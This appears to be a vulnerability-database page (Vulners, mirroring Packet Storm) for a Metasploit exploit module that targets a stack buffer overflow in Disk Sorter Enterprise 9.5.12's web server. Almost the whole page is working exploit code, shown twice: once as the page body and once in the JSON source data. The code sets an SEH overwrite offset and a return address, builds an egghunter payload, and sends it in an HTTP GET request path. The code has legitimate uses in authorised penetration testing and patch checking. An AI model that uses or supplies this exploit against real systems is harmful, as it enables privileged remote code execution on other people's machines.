Search...

Disk Sorter Enterprise 9.5.12 GET Buffer Overflow

2017-04-24T00:00:00

ID PACKETSTORM:142282
Type packetstorm
Reporter Daniel Teixeira
Modified 2017-04-24T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule &lt; Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Seh  
include Msf::Exploit::Remote::Egghunter  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' =&gt; 'Disk Sorter Enterprise GET Buffer Overflow',  
'Description' =&gt; %q{  
This module exploits a stack-based buffer overflow vulnerability  
in the web interface of Disk Sorter Enterprise v9.5.12, caused by  
improper bounds checking of the request path in HTTP GET requests  
sent to the built-in web server. This module has been tested  
successfully on Windows 7 SP1 x86.  
},  
'License' =&gt; MSF_LICENSE,  
'Author' =&gt;  
[  
'Daniel Teixeira'  
],  
'DefaultOptions' =&gt;  
{  
'EXITFUNC' =&gt; 'thread'  
},  
'Platform' =&gt; 'win',  
'Payload' =&gt;  
{  
'BadChars' =&gt; "\x00\x09\x0a\x0d\x20\x26",  
'Space' =&gt; 500  
},  
'Targets' =&gt;  
[  
[ 'Disk Sorter Enterprise v9.5.12',  
{  
'Offset' =&gt; 2488,  
'Ret' =&gt; 0x10051223 # POP # POP # RET [libspp.dll]  
}  
]  
],  
'Privileged' =&gt; true,  
'DisclosureDate' =&gt; 'Mar 15 2017',  
'DefaultTarget' =&gt; 0))  
end  
  
def check  
res = send_request_cgi(  
'method' =&gt; 'GET',  
'uri' =&gt; '/'  
)  
  
if res && res.code == 200  
version = res.body[/Disk Sorter Enterprise v[^&lt;]*/]  
if version  
vprint_status("Version detected: #{version}")  
if version =~ /9\.5\.12/  
return Exploit::CheckCode::Appears  
end  
return Exploit::CheckCode::Detected  
end  
else  
vprint_error('Unable to determine due to a HTTP connection timeout')  
return Exploit::CheckCode::Unknown  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
  
eggoptions = {  
checksum: true,  
eggtag: rand_text_alpha(4, payload_badchars)  
}  
  
hunter, egg = generate_egghunter(  
payload.encoded,  
payload_badchars,  
eggoptions  
)  
  
sploit = rand_text_alpha(target['Offset'])  
sploit &lt;&lt; generate_seh_record(target.ret)  
sploit &lt;&lt; hunter  
sploit &lt;&lt; make_nops(10)  
sploit &lt;&lt; egg  
sploit &lt;&lt; rand_text_alpha(5500)  
  
print_status('Sending request...')  
  
send_request_cgi(  
'method' =&gt; 'GET',  
'uri' =&gt; sploit  
)  
end  
end  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:142282", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Disk Sorter Enterprise 9.5.12 GET Buffer Overflow", "description": "", "published": "2017-04-24T00:00:00", "modified": "2017-04-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/142282/Disk-Sorter-Enterprise-9.5.12-GET-Buffer-Overflow.html", "reporter": "Daniel Teixeira", "references": [], "cvelist": [], "lastseen": "2017-04-25T01:25:36", "viewCount": 1, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-04-25T01:25:36", "rev": 2}, "dependencies": {"references": [], "modified": "2017-04-25T01:25:36", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/142282/disksorter_bof.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Seh \ninclude Msf::Exploit::Remote::Egghunter \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Disk Sorter Enterprise GET Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability \nin the web interface of Disk Sorter Enterprise v9.5.12, caused by \nimproper bounds checking of the request path in HTTP GET requests \nsent to the built-in web server. This module has been tested \nsuccessfully on Windows 7 SP1 x86. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniel Teixeira' \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\", \n'Space' => 500 \n}, \n'Targets' => \n[ \n[ 'Disk Sorter Enterprise v9.5.12', \n{ \n'Offset' => 2488, \n'Ret' => 0x10051223 # POP # POP # RET [libspp.dll] \n} \n] \n], \n'Privileged' => true, \n'DisclosureDate' => 'Mar 15 2017', \n'DefaultTarget' => 0)) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/' \n) \n \nif res && res.code == 200 \nversion = res.body[/Disk Sorter Enterprise v[^<]*/] \nif version \nvprint_status(\"Version detected: #{version}\") \nif version =~ /9\\.5\\.12/ \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Detected \nend \nelse \nvprint_error('Unable to determine due to a HTTP connection timeout') \nreturn Exploit::CheckCode::Unknown \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \n \neggoptions = { \nchecksum: true, \neggtag: rand_text_alpha(4, payload_badchars) \n} \n \nhunter, egg = generate_egghunter( \npayload.encoded, \npayload_badchars, \neggoptions \n) \n \nsploit = rand_text_alpha(target['Offset']) \nsploit << generate_seh_record(target.ret) \nsploit << hunter \nsploit << make_nops(10) \nsploit << egg \nsploit << rand_text_alpha(5500) \n \nprint_status('Sending request...') \n \nsend_request_cgi( \n'method' => 'GET', \n'uri' => sploit \n) \nend \nend \n`\n"}